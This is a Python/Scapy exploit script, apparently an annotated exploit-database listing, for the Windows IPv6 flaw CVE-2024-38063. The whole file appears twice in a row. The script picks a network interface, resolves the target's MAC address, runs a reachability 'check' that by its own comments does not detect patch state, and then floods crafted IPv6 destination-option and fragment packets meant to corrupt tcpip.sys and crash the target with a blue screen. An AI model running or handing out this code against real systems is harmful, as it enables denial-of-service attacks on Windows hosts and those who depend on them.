#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Windows IPv6 CVE-2024-38063 checker and denial of service (BSOD)
# Date: 2024-08-07
# Exploit Author: 光速率 (author name as it appears in this copy of the listing)
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/cve-2024-38063
# Version: Windows 10, 11 < 10.0.26100.1457 and Server 2016-2019-2022 < 10.0.17763.6189 (the '<' was lost in extraction)
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063
# Note: the "checker" step only confirms that the host answers an unknown IPv6 option with an ICMPv6
# Parameter Problem; it cannot distinguish a patched host from an unpatched one. The second step
# crashes the target -- run it only against systems you are authorised to test.
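import os, subprocess, re, time, sys

## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565'  ## Placeholder only, overridden by argv[1]
if len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Usage: <script> <target IPv6> [target MAC]
## Fallback MAC, used only when Neighbor Discovery fails. The listing shipped a hard-coded sample
## MAC here; it is now taken from argv[2] instead so a stale value is never silently sent to.
sDstMAC = ''
if len(sys.argv) > 2: sDstMAC = sys.argv[2]
iBatches = 20
iCorruptions = 20  ## How many times per batch we want to corrupt tcpip.sys memory
try:
    print('--- Loading Scapy, this may take a while.')
    from scapy.config import conf
    ## NOTE(review): presumably keeps Scapy from walking the local IPv6 routing table at import time;
    ## the layer-2 sendp path below does not need it -- confirm if the layer-3 fallback misbehaves
    conf.ipv6_enabled = False
    import scapy.all as scapy
    scapy.conf.verb = 0
except Exception as e:  ## top-level boundary: report the real cause and stop instead of running half-loaded
    print('Error loading Scapy ({}), please run "pip install scapy"'.format(e))
    sys.exit(1)
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)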
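def selectInterface():
    """Choose the local interface to send from and return (npf, ipv6, mac, name).

    npf  -- the name Scapy/Npcap expects: '\\Device\\NPF_{GUID}' on Windows (GUID taken
            from getmac's Transport Name column), the kernel interface name elsewhere
    ipv6 -- first IPv6 address found on the adapter, '' if none
    mac  -- adapter MAC, lower-case, colon separated
    name -- Windows adapter description, '' on other platforms

    With more than one candidate the user is prompted; empty, non-numeric or
    out-of-range input falls back to adapter 1. Exits with status 1 when no
    adapter with a MAC address is found.
    """
    def getAllInterfaces():
        """Enumerate adapters as [adapter, ipv6, mac, devicename, guid] lists."""
        lstInterfaces = []
        if os.name == 'nt':
            ## getmac CSV columns: Connection Name, Network Adapter, Physical Address, Transport Name
            proc = subprocess.run(['getmac', '/nh', '/v', '/fo', 'csv'], stdout=subprocess.PIPE, check=False)
            for bInterface in proc.stdout.splitlines():
                if b'disconnected' in bInterface.lower(): continue  ## media disconnected -> unusable
                lstInt = bInterface.split(b',')
                if len(lstInt) < 4: continue
                sAdapter = lstInt[0].strip(b'"').decode(errors='replace')
                sDeviceName = lstInt[1].strip(b'"').decode(errors='replace')
                sMAC = lstInt[2].strip(b'"').decode(errors='replace').lower().replace('-', ':')
                sWinGuid = lstInt[3].strip().strip(b'"').decode(errors='replace')[-38:]  ## '{GUID}' tail of \Device\Tcpip_{GUID}
                ## The adapter name is passed as its own argv element, never spliced into a shell string
                proc = subprocess.run(['netsh', 'int', 'ipv6', 'show', 'addr', sAdapter], stdout=subprocess.PIPE, check=False)
                sIP = ''
                for bLine in proc.stdout.splitlines():
                    if b'address' not in bLine.lower(): continue
                    lstFound = re.findall(r'[\w:]+:+[\w:]+', bLine.strip().decode(errors='replace'))
                    if lstFound: sIP = lstFound[0]
                    break  ## first 'address' line only, as the former findstr | [0] did
                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDeviceName, sWinGuid])
        else:
            ## One line per interface: "<name> <inet6 address(es)> <mac>"; the pipeline contains no user input
            sCmd = ("for i in $(ip address | grep -v 'lo' | grep 'default' | cut -d':' -f2 | cut -d' ' -f2);"
                    "do echo $i $(ip address show dev $i | grep 'inet6 ' | cut -d' ' -f6 | cut -d'/' -f1) "
                    "$(ip address show dev $i | grep 'ether' | cut -d' ' -f6);done")
            ## NOTE(review): grep -v 'lo' also hides any interface whose name contains 'lo' (e.g. wlo1)
            proc = subprocess.run(sCmd, shell=True, stdout=subprocess.PIPE, check=False)
            for bInterface in proc.stdout.splitlines():
                lstInt = bInterface.strip().split(b' ')
                ## The third field is the MAC only when exactly one inet6 address was printed
                if len(lstInt) >= 3 and len(lstInt[2]) == 17:
                    lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
        return lstInterfaces

    lstInterfaces = getAllInterfaces()
    if not lstInterfaces:
        print('[-] No adapter with a MAC address found, cannot send layer-2 frames')
        sys.exit(1)
    iCount = len(lstInterfaces)
    sAnswer = None
    if iCount > 1:
        for i, lstInt in enumerate(lstInterfaces, start=1):  ## adapter, ipv6, mac, windows devicename, windows guid
            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
        ## The listing had this prompt commented out and sAnswer hard-coded to '3' (debug leftover)
        sAnswer = input('[?] Please select an adapter [1] : ')
    ## Empty, non-numeric, 0 or out-of-range input selects adapter 1 ('0' would otherwise pick the last entry via index -1)
    if not sAnswer or not sAnswer.isdigit() or not 1 <= int(sAnswer) <= iCount: sAnswer = '1'
    iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]  ## Npcap device name Scapy needs for iface=
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])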
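def get_packets(iID, sDstIPv6, sDstMAC=None):
    """Build the three-packet sequence for corruption index ``iID``.

    Packet 1: IPv6 / Destination Options with one PadN option of type 0x81.
              The two high bits of 0x81 are '10', which tells a conforming IPv6
              stack to discard the packet and reply with an ICMPv6 Parameter
              Problem -- the reply the verification step relies on.
    Packet 2: IPv6 / Fragment header (id=iFragID, M=1, offset=0) plus a short payload.
    Packet 3: IPv6 / Fragment header (same id, M=0, offset=1) with no payload.

    ``iID`` is folded into the fragment id and the hop limit so successive
    triples are distinct. When ``sDstMAC`` is given each packet is wrapped in
    an Ethernet header so it can be sent with ``sendp`` at layer 2.

    NOTE(review): the listing carries 'nortalive' (9 bytes) as the fragment
    payload; RFC 8200 section 4.5 requires every non-final fragment to be a
    multiple of 8 octets long -- confirm the intended literal.
    """
    iFragID = 0xbedead00 + iID

    def ipv6Header():
        return scapy.IPv6(fl=1, hlim=64 + iID, dst=sDstIPv6)

    ## Scapy names PadN's option-type field 'otype'; the listing's 'type=' is not a PadN field
    oPacket1 = ipv6Header() / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = ipv6Header() / scapy.IPv6ExtHdrFragment(id=iFragID, m=1, offset=0) / 'nortalive'
    oPacket3 = ipv6Header() / scapy.IPv6ExtHdrFragment(id=iFragID, m=0, offset=1)
    if sDstMAC:  ## expected in the normal flow; without it the caller has to fall back to layer-3 send
        oPacket1 = scapy.Ether(dst=sDstMAC) / oPacket1
        oPacket2 = scapy.Ether(dst=sDstMAC) / oPacket2
        oPacket3 = scapy.Ether(dst=sDstMAC) / oPacket3
    return [oPacket1, oPacket2, oPacket3]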
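def doipv6nd(sDstIP, sInt, iTimeout=5):
    """Resolve the target's MAC with a single IPv6 Neighbor Solicitation.

    Sends an ICMPv6 NS for ``sDstIP`` out of interface ``sInt`` and waits up to
    ``iTimeout`` seconds (default 5, as in the listing) for a Neighbor
    Advertisement. Returns the link-layer address from the Target Link-Layer
    Address option of the reply, or None when nothing usable came back
    (target off-link, filtered, or silent). The NS advertises a broadcast
    source link-layer address, exactly as the listing does; a regular NS would
    carry the sender's own MAC instead.
    """
    oNS = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNS, timeout=iTimeout, iface=sInt)
    if oResponse is None or scapy.ICMPv6NDOptDstLLAddr not in oResponse:
        return None
    return oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr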
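lstInt = selectInterface()  ## (npf, ipv6, mac, name)
sMAC = doipv6nd(sDstIP, lstInt[0])
if sMAC:
    print(f'[+] Target {sDstIP} is reachable, got MAC address {sMAC}')
    sDstMAC = sMAC
elif sDstMAC:
    print('[-] Target does not respond to Neighbor Solicitation, using the supplied MAC {}'.format(sDstMAC))
else:
    print('[-] No MAC address, falling back to layer-3 send (Scapy must resolve the MAC itself); this may not work')

## Every corruption index is queued twice per batch, as in the listing
lstPacketsToSend = []
for _ in range(iBatches):
    for j in range(iCorruptions):
        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)
## 'send'/'sr1' are layer 3 (Scapy resolves the MAC), 'sendp'/'srp1' are layer 2 (MAC already filled in, far more reliable).
## Without a MAC the packets carry no Ethernet header, so they must go through the layer-3 functions.
bLayer2 = bool(sDstMAC)
print('[*] Checking IPv6 reachability of {}'.format(sDstIP))
## The first packet carries a destination option of type 0x81, which a conforming IPv6 stack answers
## with ICMPv6 Parameter Problem. A reply therefore proves reachability and that extension headers
## are processed; it does NOT prove the host is unpatched -- a fixed host is expected to answer the same way.
if bLayer2: oResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
else: oResp = scapy.sr1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if oResp is not None and scapy.IPv6 in oResp and scapy.ICMPv6ParamProblem in oResp:
    print('[+] {} answers with ICMPv6 Parameter Problem: reachable and parsing extension headers (patch state NOT verified)'.format(sDstIP))
else:
    input('[-] No reply: not reachable or firewalled. Verify and rerun, or press Enter to continue anyway')
print('[*] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, proceed with the Denial of Service (BSOD)? Press Ctrl+C now to cancel')
########### EXPLOIT
print('[+] Sending {} packets via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
if bLayer2: scapy.sendp(lstPacketsToSend, iface=lstInt[0])
else: scapy.send(lstPacketsToSend, iface=lstInt[0])
print('[+] All packets sent; an unpatched target should crash within roughly 60 seconds')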
# -*- coding: utf-8 -*-
# Exploit Title: Windows IPv6 CVE-2024-38063 checker and denial of service (BSOD)
# Date: 2024-08-07
# Exploit Author: 光速率 (author name as it appears in this copy of the listing)
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/cve-2024-38063
# Version: Windows 10, 11 < 10.0.26100.1457 and Server 2016-2019-2022 < 10.0.17763.6189 (the '<' was lost in extraction)
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063
# Note: the "checker" step only confirms that the host answers an unknown IPv6 option with an ICMPv6
# Parameter Problem; it cannot distinguish a patched host from an unpatched one. The second step
# crashes the target -- run it only against systems you are authorised to test.
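import os, subprocess, re, time, sys

## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565'  ## Placeholder only, overridden by argv[1]
if len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Usage: <script> <target IPv6> [target MAC]
## Fallback MAC, used only when Neighbor Discovery fails. The listing shipped a hard-coded sample
## MAC here; it is now taken from argv[2] instead so a stale value is never silently sent to.
sDstMAC = ''
if len(sys.argv) > 2: sDstMAC = sys.argv[2]
iBatches = 20
iCorruptions = 20  ## How many times per batch we want to corrupt tcpip.sys memory
try:
    print('--- Loading Scapy, this may take a while.')
    from scapy.config import conf
    ## NOTE(review): presumably keeps Scapy from walking the local IPv6 routing table at import time;
    ## the layer-2 sendp path below does not need it -- confirm if the layer-3 fallback misbehaves
    conf.ipv6_enabled = False
    import scapy.all as scapy
    scapy.conf.verb = 0
except Exception as e:  ## top-level boundary: report the real cause and stop instead of running half-loaded
    print('Error loading Scapy ({}), please run "pip install scapy"'.format(e))
    sys.exit(1)
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)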
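def selectInterface():
    """Choose the local interface to send from and return (npf, ipv6, mac, name).

    npf  -- the name Scapy/Npcap expects: '\\Device\\NPF_{GUID}' on Windows (GUID taken
            from getmac's Transport Name column), the kernel interface name elsewhere
    ipv6 -- first IPv6 address found on the adapter, '' if none
    mac  -- adapter MAC, lower-case, colon separated
    name -- Windows adapter description, '' on other platforms

    With more than one candidate the user is prompted; empty, non-numeric or
    out-of-range input falls back to adapter 1. Exits with status 1 when no
    adapter with a MAC address is found.
    """
    def getAllInterfaces():
        """Enumerate adapters as [adapter, ipv6, mac, devicename, guid] lists."""
        lstInterfaces = []
        if os.name == 'nt':
            ## getmac CSV columns: Connection Name, Network Adapter, Physical Address, Transport Name
            proc = subprocess.run(['getmac', '/nh', '/v', '/fo', 'csv'], stdout=subprocess.PIPE, check=False)
            for bInterface in proc.stdout.splitlines():
                if b'disconnected' in bInterface.lower(): continue  ## media disconnected -> unusable
                lstInt = bInterface.split(b',')
                if len(lstInt) < 4: continue
                sAdapter = lstInt[0].strip(b'"').decode(errors='replace')
                sDeviceName = lstInt[1].strip(b'"').decode(errors='replace')
                sMAC = lstInt[2].strip(b'"').decode(errors='replace').lower().replace('-', ':')
                sWinGuid = lstInt[3].strip().strip(b'"').decode(errors='replace')[-38:]  ## '{GUID}' tail of \Device\Tcpip_{GUID}
                ## The adapter name is passed as its own argv element, never spliced into a shell string
                proc = subprocess.run(['netsh', 'int', 'ipv6', 'show', 'addr', sAdapter], stdout=subprocess.PIPE, check=False)
                sIP = ''
                for bLine in proc.stdout.splitlines():
                    if b'address' not in bLine.lower(): continue
                    lstFound = re.findall(r'[\w:]+:+[\w:]+', bLine.strip().decode(errors='replace'))
                    if lstFound: sIP = lstFound[0]
                    break  ## first 'address' line only, as the former findstr | [0] did
                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDeviceName, sWinGuid])
        else:
            ## One line per interface: "<name> <inet6 address(es)> <mac>"; the pipeline contains no user input
            sCmd = ("for i in $(ip address | grep -v 'lo' | grep 'default' | cut -d':' -f2 | cut -d' ' -f2);"
                    "do echo $i $(ip address show dev $i | grep 'inet6 ' | cut -d' ' -f6 | cut -d'/' -f1) "
                    "$(ip address show dev $i | grep 'ether' | cut -d' ' -f6);done")
            ## NOTE(review): grep -v 'lo' also hides any interface whose name contains 'lo' (e.g. wlo1)
            proc = subprocess.run(sCmd, shell=True, stdout=subprocess.PIPE, check=False)
            for bInterface in proc.stdout.splitlines():
                lstInt = bInterface.strip().split(b' ')
                ## The third field is the MAC only when exactly one inet6 address was printed
                if len(lstInt) >= 3 and len(lstInt[2]) == 17:
                    lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
        return lstInterfaces

    lstInterfaces = getAllInterfaces()
    if not lstInterfaces:
        print('[-] No adapter with a MAC address found, cannot send layer-2 frames')
        sys.exit(1)
    iCount = len(lstInterfaces)
    sAnswer = None
    if iCount > 1:
        for i, lstInt in enumerate(lstInterfaces, start=1):  ## adapter, ipv6, mac, windows devicename, windows guid
            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
        ## The listing had this prompt commented out and sAnswer hard-coded to '3' (debug leftover)
        sAnswer = input('[?] Please select an adapter [1] : ')
    ## Empty, non-numeric, 0 or out-of-range input selects adapter 1 ('0' would otherwise pick the last entry via index -1)
    if not sAnswer or not sAnswer.isdigit() or not 1 <= int(sAnswer) <= iCount: sAnswer = '1'
    iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]  ## Npcap device name Scapy needs for iface=
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])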
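def get_packets(iID, sDstIPv6, sDstMAC=None):
    """Build the three-packet sequence for corruption index ``iID``.

    Packet 1: IPv6 / Destination Options with one PadN option of type 0x81.
              The two high bits of 0x81 are '10', which tells a conforming IPv6
              stack to discard the packet and reply with an ICMPv6 Parameter
              Problem -- the reply the verification step relies on.
    Packet 2: IPv6 / Fragment header (id=iFragID, M=1, offset=0) plus a short payload.
    Packet 3: IPv6 / Fragment header (same id, M=0, offset=1) with no payload.

    ``iID`` is folded into the fragment id and the hop limit so successive
    triples are distinct. When ``sDstMAC`` is given each packet is wrapped in
    an Ethernet header so it can be sent with ``sendp`` at layer 2.

    NOTE(review): the listing carries 'nortalive' (9 bytes) as the fragment
    payload; RFC 8200 section 4.5 requires every non-final fragment to be a
    multiple of 8 octets long -- confirm the intended literal.
    """
    iFragID = 0xbedead00 + iID

    def ipv6Header():
        return scapy.IPv6(fl=1, hlim=64 + iID, dst=sDstIPv6)

    ## Scapy names PadN's option-type field 'otype'; the listing's 'type=' is not a PadN field
    oPacket1 = ipv6Header() / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = ipv6Header() / scapy.IPv6ExtHdrFragment(id=iFragID, m=1, offset=0) / 'nortalive'
    oPacket3 = ipv6Header() / scapy.IPv6ExtHdrFragment(id=iFragID, m=0, offset=1)
    if sDstMAC:  ## expected in the normal flow; without it the caller has to fall back to layer-3 send
        oPacket1 = scapy.Ether(dst=sDstMAC) / oPacket1
        oPacket2 = scapy.Ether(dst=sDstMAC) / oPacket2
        oPacket3 = scapy.Ether(dst=sDstMAC) / oPacket3
    return [oPacket1, oPacket2, oPacket3]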
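def doipv6nd(sDstIP, sInt, iTimeout=5):
    """Resolve the target's MAC with a single IPv6 Neighbor Solicitation.

    Sends an ICMPv6 NS for ``sDstIP`` out of interface ``sInt`` and waits up to
    ``iTimeout`` seconds (default 5, as in the listing) for a Neighbor
    Advertisement. Returns the link-layer address from the Target Link-Layer
    Address option of the reply, or None when nothing usable came back
    (target off-link, filtered, or silent). The NS advertises a broadcast
    source link-layer address, exactly as the listing does; a regular NS would
    carry the sender's own MAC instead.
    """
    oNS = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNS, timeout=iTimeout, iface=sInt)
    if oResponse is None or scapy.ICMPv6NDOptDstLLAddr not in oResponse:
        return None
    return oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr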
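lstInt = selectInterface()  ## (npf, ipv6, mac, name)
sMAC = doipv6nd(sDstIP, lstInt[0])
if sMAC:
    print(f'[+] Target {sDstIP} is reachable, got MAC address {sMAC}')
    sDstMAC = sMAC
elif sDstMAC:
    print('[-] Target does not respond to Neighbor Solicitation, using the supplied MAC {}'.format(sDstMAC))
else:
    print('[-] No MAC address, falling back to layer-3 send (Scapy must resolve the MAC itself); this may not work')

## Every corruption index is queued twice per batch, as in the listing
lstPacketsToSend = []
for _ in range(iBatches):
    for j in range(iCorruptions):
        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)
## 'send'/'sr1' are layer 3 (Scapy resolves the MAC), 'sendp'/'srp1' are layer 2 (MAC already filled in, far more reliable).
## Without a MAC the packets carry no Ethernet header, so they must go through the layer-3 functions.
bLayer2 = bool(sDstMAC)
print('[*] Checking IPv6 reachability of {}'.format(sDstIP))
## The first packet carries a destination option of type 0x81, which a conforming IPv6 stack answers
## with ICMPv6 Parameter Problem. A reply therefore proves reachability and that extension headers
## are processed; it does NOT prove the host is unpatched -- a fixed host is expected to answer the same way.
if bLayer2: oResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
else: oResp = scapy.sr1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if oResp is not None and scapy.IPv6 in oResp and scapy.ICMPv6ParamProblem in oResp:
    print('[+] {} answers with ICMPv6 Parameter Problem: reachable and parsing extension headers (patch state NOT verified)'.format(sDstIP))
else:
    input('[-] No reply: not reachable or firewalled. Verify and rerun, or press Enter to continue anyway')
print('[*] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, proceed with the Denial of Service (BSOD)? Press Ctrl+C now to cancel')
########### EXPLOIT
print('[+] Sending {} packets via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
if bLayer2: scapy.sendp(lstPacketsToSend, iface=lstInt[0])
else: scapy.send(lstPacketsToSend, iface=lstInt[0])
print('[+] All packets sent; an unpatched target should crash within roughly 60 seconds')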